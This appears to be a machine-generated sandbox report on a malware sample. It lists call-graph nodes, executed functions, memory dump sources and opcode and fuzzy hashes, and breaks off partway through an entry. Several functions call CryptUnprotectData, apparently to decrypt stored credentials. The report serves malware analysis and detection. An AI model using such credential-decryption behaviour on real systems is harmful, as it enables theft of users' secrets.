CreateWindowExW 46261->46264 46262 37dd09dd 46262->46253 46263->46262 46264->46262 46266 37dd09dd 46265->46266 46267 37dd09ed CreateWindowExW 46265->46267 46268 37dd09f8 CreateWindowExW 46265->46268 46266->46253 46267->46266 46268->46266 46054 ad044 46055 ad05c 46054->46055 46056 ad0b6 46055->46056 46061 37dd0b9f 46055->46061 46066 37dd0bb0 46055->46066 46071 37dd18f8 46055->46071 46077 37dd1908 46055->46077 46062 37dd0bb0 46061->46062 46064 37dd1908 2 API calls 46062->46064 46065 37dd18f8 2 API calls 46062->46065 46063 37dd0bf7 46063->46056 46064->46063 46065->46063 46067 37dd0bd6 46066->46067 46069 37dd1908 2 API calls 46067->46069 46070 37dd18f8 2 API calls 46067->46070 46068 37dd0bf7 46068->46056 46069->46068 46070->46068 46072 37dd1935 46071->46072 46073 37dd1967 46072->46073 46083 37dd1e98 46072->46083 46088 37dd1f64 46072->46088 46094 37dd1e88 46072->46094 46078 37dd1935 46077->46078 46079 37dd1967 46078->46079 46080 37dd1e98 2 API calls 46078->46080 46081 37dd1e88 2 API calls 46078->46081 46082 37dd1f64 2 API calls 46078->46082 46080->46079 46081->46079 46082->46079 46085 37dd1eac 46083->46085 46084 37dd1f38 46084->46073 46099 37dd1f3f 46085->46099 46102 37dd1f50 46085->46102 46089 37dd1f22 46088->46089 46090 37dd1f72 46088->46090 46092 37dd1f3f 2 API calls 46089->46092 46093 37dd1f50 2 API calls 46089->46093 46091 37dd1f38 46091->46073 46092->46091 46093->46091 46095 37dd1e23 46094->46095 46095->46094 46097 37dd1f3f 2 API calls 46095->46097 46098 37dd1f50 2 API calls 46095->46098 46096 37dd1f38 46096->46073 46097->46096 46098->46096 46100 37dd1f61 46099->46100 46105 37dd3100 46099->46105 46100->46084 46103 37dd1f61 46102->46103 46104 37dd3100 2 API calls 46102->46104 46103->46084 46104->46103 46109 37dd3140 46105->46109 46113 37dd3130 46105->46113 46106 37dd312a 46106->46100 46110 37dd3182 46109->46110 46112 37dd3189 46109->46112 46111 37dd31da CallWindowProcW 46110->46111 46110->46112 46111->46112 46112->46106 46114 37dd3135 46113->46114 46115 37dd31da CallWindowProcW 46114->46115 46116 37dd3189 46114->46116 46115->46116 46116->46106

                                                                                Executed Functions

                                                                                Function 3784C302 Relevance: 1.7, APIs: 1, Instructions: 205encryptionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 704 3784c302-3784c305 705 3784c307-3784c308 704->705 706 3784c2b9-3784c2ca CryptUnprotectData 704->706 707 3784c385-3784c3a5 705->707 708 3784c30a-3784c335 705->708 709 3784c2d3-3784c2fb 706->709 710 3784c2cc-3784c2d2 706->710 717 3784c3a7 707->717 718 3784c3ac-3784c3b3 707->718 711 3784c337 708->711 712 3784c33c-3784c382 708->712 710->709 711->712 712->707 717->718 719 3784c3b5 718->719 720 3784c3ba-3784c3c1 718->720 719->720 721 3784c3c3 720->721 722 3784c3c8-3784c3ed 720->722 721->722 724 3784c3f4-3784c427 722->724 725 3784c3ef 722->725 728 3784c42e-3784c435 724->728 729 3784c429 724->729 725->724 730 3784c437 728->730 731 3784c43c-3784c443 728->731 729->728 730->731 732 3784c445 731->732 733 3784c44a-3784c46a 731->733 732->733 735 3784c471-3784c498 733->735 736 3784c46c 733->736 738 3784c49f-3784c4e0 735->738 739 3784c49a 735->739 736->735 748 3784c4e2 call 3784ca80 738->748 749 3784c4e2 call 3784ca70 738->749 739->738 744 3784c4e8-3784c557 748->744 749->744
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3784C2BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CryptDataUnprotect
                                                                                • String ID:
                                                                                • API String ID: 834300711-0
                                                                                • Opcode ID: 0942bea96cc12190b17d914ce40ca1f91724c1f87bfc11bb54052736737ea555
                                                                                • Instruction ID: dd0064e18eb0a52437dd7f912130bb11dcefc97e69eff2a1e56563600ffe2c89
                                                                                • Opcode Fuzzy Hash: 0942bea96cc12190b17d914ce40ca1f91724c1f87bfc11bb54052736737ea555
                                                                                • Instruction Fuzzy Hash: A2812475E0020D9FEB08DFE9D940BDEBBF2AF88310F248529E408AB355DB759946CB54
                                                                                Function 3784BBC8 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 832 3784bbc8-3784c2ca CryptUnprotectData 835 3784c2d3-3784c2fb 832->835 836 3784c2cc-3784c2d2 832->836 836->835
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3784C2BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CryptDataUnprotect
                                                                                • String ID:
                                                                                • API String ID: 834300711-0
                                                                                • Opcode ID: c5db73b37ac4de0d4c14d658a463834e18252ee18aa9a29ba178aebc73b61e10
                                                                                • Instruction ID: abdb9b3b074f48ba3c2c946cce1fdefa5475ed0d739437a88076a5f8efca397f
                                                                                • Opcode Fuzzy Hash: c5db73b37ac4de0d4c14d658a463834e18252ee18aa9a29ba178aebc73b61e10
                                                                                • Instruction Fuzzy Hash: C11144B6800249AFDB10CF9AC844BDEBBF4EF58320F14841AE514A7241D3B8A954DFA1
                                                                                Function 3784C250 Relevance: 1.6, APIs: 1, Instructions: 52encryptionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3784C2BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CryptDataUnprotect
                                                                                • String ID:
                                                                                • API String ID: 834300711-0
                                                                                • Opcode ID: d12babfe9b0c07ec80d599474134d7663b7a76c441cb3d8a419d12b86c71f3f6
                                                                                • Instruction ID: 96aa60eb92b778ff8760fba88ea930e43c5f1dda1bc47f3a3f12d06b9088f202
                                                                                • Opcode Fuzzy Hash: d12babfe9b0c07ec80d599474134d7663b7a76c441cb3d8a419d12b86c71f3f6
                                                                                • Instruction Fuzzy Hash: A01159B6800249DFDB10CF99D844BDEBFF5EF58320F14841AE524A7251C378A594DFA1
                                                                                Function 37B93D10 Relevance: .7, Instructions: 745COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9b5f87bc67d04c010c001ac32dd4edf4cc1f299b6b12f176ba23fe869b627417
                                                                                • Instruction ID: e5f4d425e4538ef4c318031a492699c0b3b546642a781d72712c0f900c7b6c86
                                                                                • Opcode Fuzzy Hash: 9b5f87bc67d04c010c001ac32dd4edf4cc1f299b6b12f176ba23fe869b627417
                                                                                • Instruction Fuzzy Hash: E7826E74A112288FEB64DF69D894BDDBBB2BF89310F1081E9D80DA7261DB355E85CF40
                                                                                Function 0016F01B Relevance: .7, Instructions: 711COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c64210db4275fb597e3d480f8745a544ba0c8145ca461e06883e41ab215df16
                                                                                • Instruction ID: 95595edb8c851c7ef0932fd454c7b518a9e3918b1623f273416ee99062c6a703
                                                                                • Opcode Fuzzy Hash: 8c64210db4275fb597e3d480f8745a544ba0c8145ca461e06883e41ab215df16
                                                                                • Instruction Fuzzy Hash: 4A72B074E01229CFDB64DF69D880BEDBBB2BB49305F5481EAD409A7251DB349E82CF50
                                                                                Function 0016990B Relevance: .7, Instructions: 673COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46edb2261ad60be1a8126cd7af522540e541406553fc0f430004536bcfbbbdc0
                                                                                • Instruction ID: 501f6125dd26b28134ebf0449707206be5d5cf3ce262e03aa387fb2f72ba5730
                                                                                • Opcode Fuzzy Hash: 46edb2261ad60be1a8126cd7af522540e541406553fc0f430004536bcfbbbdc0
                                                                                • Instruction Fuzzy Hash: EA528D71A00209DFCB14DFA8CD94AAEBBF2BF89300F158555E806AB2A1D734ED51CF91
                                                                                Function 00166118 Relevance: .6, Instructions: 568COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6f5657fa60779f8d07b746e92c5fd5dffe76011d6f11adb7282948c441188dd7
                                                                                • Instruction ID: 2cc5a24de32e6d106c8a92e695d2c3d3c2823eb041ba39bb2e6842441a1d1ca5
                                                                                • Opcode Fuzzy Hash: 6f5657fa60779f8d07b746e92c5fd5dffe76011d6f11adb7282948c441188dd7
                                                                                • Instruction Fuzzy Hash: 36227E70A002199FDB18DFA9C854BAEBBF6BF88304F148569E406EB391DF349D51DB90
                                                                                Function 00166880 Relevance: .3, Instructions: 331COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1c267d94f5fd0bbde6604188e1aea8f1cdfabc6ba8aa69d623513a5433912147
                                                                                • Instruction ID: 98c458b0a60332ccac08bc0cdf6c855f5b19dc0235db65fc42be3b0fd7d436e9
                                                                                • Opcode Fuzzy Hash: 1c267d94f5fd0bbde6604188e1aea8f1cdfabc6ba8aa69d623513a5433912147
                                                                                • Instruction Fuzzy Hash: 77D12A71A00219DFCB14CFA9CD84AADBBB2FF88345F158069E845EB265D731ED61CB50
                                                                                Function 37B9B168 Relevance: .3, Instructions: 296COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6fa6c266af2699fa2f4e884085f6d71eec3089b1f303a2950b9f60ea139ab9d7
                                                                                • Instruction ID: b25b2443c8fa5178e9216ba9c80d474efc8f8c3f68d11b4db5fe2b2ec04effab
                                                                                • Opcode Fuzzy Hash: 6fa6c266af2699fa2f4e884085f6d71eec3089b1f303a2950b9f60ea139ab9d7
                                                                                • Instruction Fuzzy Hash: 01E1C074E01218CFEB54DFA9D880BDDBBB2BF89304F2081A9D418AB391DB755A85CF51
                                                                                Function 37B92BB0 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0652a5e397bd1c6e681ad3818450ac712bdf3debf9b48ff2e726590c31256e61
                                                                                • Instruction ID: b3555fe6e8301fb8c15df85028ac59f02212cf93e5d89c4f173264f56b692eeb
                                                                                • Opcode Fuzzy Hash: 0652a5e397bd1c6e681ad3818450ac712bdf3debf9b48ff2e726590c31256e61
                                                                                • Instruction Fuzzy Hash: C0C1C074E00218CFEB54DFA9D880BDDBBB2AF89304F2081A9D419AB355DB355E85CF50
                                                                                Function 378411C0 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7ee65befe3094702777774afabec03017a61eba589729159300363aa45b208c8
                                                                                • Instruction ID: c38b2575b5cb4d00b0728ea41e9d5724c1fb71bf41e66b2980d7e322feb238fe
                                                                                • Opcode Fuzzy Hash: 7ee65befe3094702777774afabec03017a61eba589729159300363aa45b208c8
                                                                                • Instruction Fuzzy Hash: DDC1A274E00218CFDB54DFA5D984B9DBBB2BF89304F2081A9D809A7365DB355E85CF50
                                                                                Function 0016B0A0 Relevance: .2, Instructions: 235COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f3eebe50ab98bf73130a9f20feffd2c88e0bb86ab791eb783892b0a9282da1cf
                                                                                • Instruction ID: 3c6f9b2d6956b978000d6f04a4c7f10c3d9627e867373802247539db501aedc8
                                                                                • Opcode Fuzzy Hash: f3eebe50ab98bf73130a9f20feffd2c88e0bb86ab791eb783892b0a9282da1cf
                                                                                • Instruction Fuzzy Hash: 20A1E874E04258DFDB18DFA9D894A9EBBF2BF89300F158069E419EB361DB349981CF50
                                                                                Function 37841620 Relevance: .2, Instructions: 220COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b5c334dff9d93d3d3e031fa2e9891bfb78edad2f7f747b7180a3fe8a86966075
                                                                                • Instruction ID: 089edfe476af8eb5140f64e8385e7509c07e65b12c1a98123f9efedf5de0a493
                                                                                • Opcode Fuzzy Hash: b5c334dff9d93d3d3e031fa2e9891bfb78edad2f7f747b7180a3fe8a86966075
                                                                                • Instruction Fuzzy Hash: 5EA1F474E00208CFEB14DFA9C944BDDBBB1FF89314F208269E419AB291DB745A85CF55
                                                                                Function 0016BEBB Relevance: .2, Instructions: 220COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ed69e2d250c902dbf66e62c29e6d816156cd1f2ad6e5390cdacf206ecf02352a
                                                                                • Instruction ID: 3e258e407a3e13cbc565978d7f28ef14549ac1b59f9f0d295979d3b8a9f13ceb
                                                                                • Opcode Fuzzy Hash: ed69e2d250c902dbf66e62c29e6d816156cd1f2ad6e5390cdacf206ecf02352a
                                                                                • Instruction Fuzzy Hash: 7B91E774E00208CFDB18DFAAD984AADBBF2BF89300F15C069E459AB365DB319941DF50
                                                                                Function 37B9D6A0 Relevance: .2, Instructions: 219COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7fee94f7e672c0fc1fd113e38a3fe8f327070255128d08823b50aa7aa314ddb0
                                                                                • Instruction ID: 0f95815ed4eb6ffc817226d6228dabbed688888d0c602f8d833eaebf55bb2c9b
                                                                                • Opcode Fuzzy Hash: 7fee94f7e672c0fc1fd113e38a3fe8f327070255128d08823b50aa7aa314ddb0
                                                                                • Instruction Fuzzy Hash: BAA180B4E012288FEB18DF6AC944BDDBBF2AB89300F14C5AAD408B7255DB745A85CF50
                                                                                Function 37B9DCF0 Relevance: .2, Instructions: 219COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d629fb2876550eafa730b1c768df9a5e3c2b67fdc2187e482277a097416eda5a
                                                                                • Instruction ID: 6353bddebac797dd301d455d154ed3483c75015474851afffdaec3f2399490c9
                                                                                • Opcode Fuzzy Hash: d629fb2876550eafa730b1c768df9a5e3c2b67fdc2187e482277a097416eda5a
                                                                                • Instruction Fuzzy Hash: 51A19FB5E012288FEB58CF6AC945BDDBBF2AF89300F14C0AAD408B7255DB345A85CF50
                                                                                Function 37B9EFD8 Relevance: .2, Instructions: 219COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4f7de048bdc9488a3acc4536cf86fc020f51652dc37a4cf05254d7fcffbce262
                                                                                • Instruction ID: 4a774a075c27526ba8b73837744c9ba6cb1a6e3728298ad1472189cf041acfef
                                                                                • Opcode Fuzzy Hash: 4f7de048bdc9488a3acc4536cf86fc020f51652dc37a4cf05254d7fcffbce262
                                                                                • Instruction Fuzzy Hash: F3A190B5E01228CFEB18CF6AC944BDDBBF2AB89310F14C1AAD408B7255DB345A85CF50
                                                                                Function 37B9BD70 Relevance: .2, Instructions: 219COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80259d7c9eaf58907224eba35c3612b9aa807a9a0cb7b18bbe6a7efdd46c08a6
                                                                                • Instruction ID: e5cd74e4115d048fca8eeebc227386a242a68b4623d5c4d30d37fb1a6a6daab7
                                                                                • Opcode Fuzzy Hash: 80259d7c9eaf58907224eba35c3612b9aa807a9a0cb7b18bbe6a7efdd46c08a6
                                                                                • Instruction Fuzzy Hash: E5A172B4E012288FEB58CF6AC944BDDBBF2AF89300F14C1AAD419A7255DB345A85CF51
                                                                                Function 37B9D050 Relevance: .2, Instructions: 219COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 433b88b5a9218f7e9d868d6d6cb7c4f0f5355f16778f8c224aaf986b453efec0
                                                                                • Instruction ID: 5f9956160efb1960bb3a864826f88fbfe4179aa0d3c7c84f9b8a3ffb3ca3db25
                                                                                • Opcode Fuzzy Hash: 433b88b5a9218f7e9d868d6d6cb7c4f0f5355f16778f8c224aaf986b453efec0
                                                                                • Instruction Fuzzy Hash: 8EA190B4E012288FEB58CF6AC944BDDBBF2AF89300F14C1AAD408B7255DB745A85CF51
                                                                                Function 37B9E340 Relevance: .2, Instructions: 219COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: df7f445370a73c6686ef5429fc37ae550e3503cd8572f871409b95591960acdd
                                                                                • Instruction ID: 8ee80f2e182a55f8435f2f20e60cd14d04d8c3bf4a1da8fae3b8955f493e11fe
                                                                                • Opcode Fuzzy Hash: df7f445370a73c6686ef5429fc37ae550e3503cd8572f871409b95591960acdd
                                                                                • Instruction Fuzzy Hash: 00A18FB5E012288FEB58CF6AC944BDDBBF2AF89300F14C1AAD409B7255DB345A85CF51
                                                                                Function 37B9E990 Relevance: .2, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0cc4474f60c0e125ea859e337a79a25e2238b73b741af758e58fd61e0763a248
                                                                                • Instruction ID: b7bd7aeea1bbd34e89a5afe8f8da88bae84f8b9c4c7a2961bf208aad3470e80b
                                                                                • Opcode Fuzzy Hash: 0cc4474f60c0e125ea859e337a79a25e2238b73b741af758e58fd61e0763a248
                                                                                • Instruction Fuzzy Hash: 11A184B5E012288FEB58CF6AC944BDDBBF2AF89300F14C1AAD409B7255DB345A85CF51
                                                                                Function 37B9C3C0 Relevance: .2, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e240e258adb01cce947d34150b79e31acd5cfd3106e3e8553a0ea6fccd569ff1
                                                                                • Instruction ID: 7afe500c58e62e88bda9a4625aa7fe6c56a57b1d1bdcc04b2a0d64bf0442cc4e
                                                                                • Opcode Fuzzy Hash: e240e258adb01cce947d34150b79e31acd5cfd3106e3e8553a0ea6fccd569ff1
                                                                                • Instruction Fuzzy Hash: 4DA194B4E012288FEB54CF6AC944BDDBBF2AF89300F14D1AAD409B7255DB345A85CF51
                                                                                Function 37B9CA08 Relevance: .2, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7d7c00654e54fe72209fbe8c6eaecd7f80603d596cda444119f96b46915ed51a
                                                                                • Instruction ID: 7da09e08503f8e805dda479169eb24bbbaa314d36336824c11f933813e1586c1
                                                                                • Opcode Fuzzy Hash: 7d7c00654e54fe72209fbe8c6eaecd7f80603d596cda444119f96b46915ed51a
                                                                                • Instruction Fuzzy Hash: E8A192B4E012288FEB58CF6AC944BDDBBF2AF89300F14D1AAD408B7255DB345A85CF54
                                                                                Function 37841966 Relevance: .2, Instructions: 202COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5327ab5c848d3dc72e493f7c389cf6213c6e27f6a54d457905eac1658a593360
                                                                                • Instruction ID: b0d3f9c762b91d27ab4bbca0ea5b4856de765b62224f086b806aee1ea835fd2b
                                                                                • Opcode Fuzzy Hash: 5327ab5c848d3dc72e493f7c389cf6213c6e27f6a54d457905eac1658a593360
                                                                                • Instruction Fuzzy Hash: 4391D274D00208CFEB14DFA9C984BDCBBB1FF49314F208269E409AB291DBB59A85CF55
                                                                                Function 0016C198 Relevance: .2, Instructions: 200COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 84594f6f07445bf59bfc88162444101d5efbbeb83ac9f37f367fd952df57ea66
                                                                                • Instruction ID: 1d361648330eb46f4af7887ccff56a508b429774c7c6db286b2a50ee21ab60b1
                                                                                • Opcode Fuzzy Hash: 84594f6f07445bf59bfc88162444101d5efbbeb83ac9f37f367fd952df57ea66
                                                                                • Instruction Fuzzy Hash: 4291B474E00218CFDB18DFAAD884AADBBF2BF89300F15C069E459AB365DB345945DF50
                                                                                Function 0016BBD8 Relevance: .2, Instructions: 197COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 11630ce93ad40090cd429b2ced3534b9120e7e1862d23913a089d28623c69e26
                                                                                • Instruction ID: 2426eb4078504c33284a573628fab81532166ba03ebb988c1ca64f3f51fe6b4e
                                                                                • Opcode Fuzzy Hash: 11630ce93ad40090cd429b2ced3534b9120e7e1862d23913a089d28623c69e26
                                                                                • Instruction Fuzzy Hash: F891D574E042188FEB18DFAAD884A9DBBF2BF89304F158069D409EB365DB349981CF50
                                                                                Function 0016CA38 Relevance: .2, Instructions: 189COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8f36ed5c2cbaf881a2551c191a0de900c8856368e0f3e0e79acc427f3fe022d8
                                                                                • Instruction ID: 12fbab7fe9cb951bed490b6dd2c27ef976344e96bec2ab41a9babe7e73d00257
                                                                                • Opcode Fuzzy Hash: 8f36ed5c2cbaf881a2551c191a0de900c8856368e0f3e0e79acc427f3fe022d8
                                                                                • Instruction Fuzzy Hash: 7481C474E00218CFEB18DFAAD984A9DBBF2BF89300F15C069E859AB365DB345941DF50
                                                                                Function 00164AD8 Relevance: .2, Instructions: 189COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 55e720c0b17badf28e8aa2267e3944caf47fc2c02d96dc4405ce43ceb670321b
                                                                                • Instruction ID: 68076d6e42dd68dd071c577231931a9f596f6ce168ef30ffde24a6702b152505
                                                                                • Opcode Fuzzy Hash: 55e720c0b17badf28e8aa2267e3944caf47fc2c02d96dc4405ce43ceb670321b
                                                                                • Instruction Fuzzy Hash: 6581B574E01218DFDB18DFA9D884A9DBBF2BF89300F15C069D819AB365DB349941CF50
                                                                                Function 0016C47B Relevance: .2, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 514288d9329a02bc191a78e4565cfe51e511845de52d9a34dcb4adb7ad372667
                                                                                • Instruction ID: 9ec24eae8957382dc31ca7694244dc57b595b32a5b48abf1a06e6f8c7bd1047f
                                                                                • Opcode Fuzzy Hash: 514288d9329a02bc191a78e4565cfe51e511845de52d9a34dcb4adb7ad372667
                                                                                • Instruction Fuzzy Hash: 4D81B374E00218DFEB18DFAAD884AADBBF2BF89300F159169E459AB365DB305941CF50
                                                                                Function 0016C75F Relevance: .2, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e43123e2d3fa442b0378595227824047848b0ed1d311c722f659eeea74a785e7
                                                                                • Instruction ID: 8079654de67cbecf069fdb0f1c56e1a8c03dd81729f290f33fd2967506e87eaf
                                                                                • Opcode Fuzzy Hash: e43123e2d3fa442b0378595227824047848b0ed1d311c722f659eeea74a785e7
                                                                                • Instruction Fuzzy Hash: D781B474E00218CFEB18DFA9D884AADBBF2BF89304F15C169E459AB365DB309941CF50
                                                                                Function 37B9C3B0 Relevance: .2, Instructions: 164COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 01caac7e2ecf509b3c59d6880d8d45dbb921cbd460dbfbd7ae90e9892ce30829
                                                                                • Instruction ID: 8a25647eddc689d0c12a967284569baff961879c781e56243983a0adba17e411
